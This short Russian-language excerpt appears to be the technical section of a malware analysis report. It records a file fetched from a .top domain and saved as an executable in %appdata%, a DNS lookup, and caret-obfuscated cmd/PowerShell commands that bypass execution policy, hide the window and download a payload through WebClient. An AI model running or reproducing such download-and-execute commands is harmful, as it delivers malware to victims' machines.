Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^erS^h^eL^L.ex^e -eX^E^cuTio^Npoli^CY ^bY^pA^S^s^ -^nOPrOF^Il^e -w^IND^OW^S^ty^LE ^hId^DEn (^n^Ew-^o^B^j^eCt ^SySte^M.NeT.w^ebclIEN^T)^.dO^wnL^O^a^d^file^('http://toagoore...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^OW^erS^h^eL^L.ex^e -eX^E^cuTio^Npoli^CY ^bY^pA^S^s^ -^nOPrOF^Il^e -w^IND^OW^S^ty^LE ^hId^DEn (^n^Ew-^o^B^j^eCt ^SySte^M.NeT.w^ebclIEN^T)^.dO^wnL^O^a^d^file^('http://toagoore...' (со скрытым окном)